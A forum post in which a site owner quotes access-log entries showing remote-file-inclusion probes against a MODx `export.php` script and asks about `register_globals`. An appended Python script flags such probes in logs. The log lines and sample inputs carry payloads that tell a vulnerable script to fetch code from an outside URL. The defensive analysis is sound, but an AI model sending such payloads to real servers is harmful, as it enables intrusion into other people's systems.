I think I may have found it in the log file. If turning off register_globals will fix this, that’s a huge help. I’m glad you guys are here to teach this stuff and answer questions without making me feel like an idiot.
(just when I thought I was getting the hang of it too!)
I found a bunch of entries similar to this:
64.191.102.117 - - [04/May/2009:00:39:52 -0400] "GET ///host/patch/modules/sync/export.php?export_to=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 9867 "-" "Mozilla/5.0"
64.191.102.117 - - [04/May/2009:00:39:52 -0400] "GET /localprograms/onthemenu/recipes///host/patch/modules/sync/export.php?export_to=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 9867 "-" "Mozilla/5.0"
So if I’m interpreting it right, this WASN’T the reflect exploit but just a simple hack of the register_globals, which I should always keep off, and they happened to find my development directory of MODx by luck?
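An added example, not part of the original post: a small Python scan that flags access-log requests like the ones quoted above, where a query parameter's value is itself a remote URL, and marks any that did not get a 4xx/5xx response. It assumes Apache combined log format; the function name `find_rfi_probes` is hypothetical and the sample lines are constructed (documentation IP ranges, example.org).

```python
import re
from urllib.parse import parse_qsl

# Apache combined log: host ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+'
)
# A parameter value that starts with a remote scheme is the signature of an
# include-a-remote-file probe such as export_to=http://...
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines, modelled on the entries quoted in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/May/2009:00:39:52 -0400] "GET /modules/sync/export.php'
    '?export_to=http://files.example.org/copyright.txt??? HTTP/1.1" 404 9867 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/May/2009:00:39:53 -0400] "GET /dev/index.php'
    '?page=http%3A%2F%2Ffiles.example.org%2Fid.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [04/May/2009:00:40:10 -0400] "GET /recipes/index.php'
    '?id=12&sort=name HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        _path, _sep, query = m.group("target").partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                status = int(m.group("status"))
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "param": name,
                    "value": value,
                    "status": status,
                    # 4xx/5xx: the probed script was missing or refused the request.
                    # Anything else means the script answered and needs a closer look.
                    "needs_review": status < 400,
                })
    return hits

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(hit)
```

A 404 on every hit, as in the quoted entries, means the requested script did not exist at that path; hits with `needs_review` set are the ones to check against the application code and the `register_globals` setting.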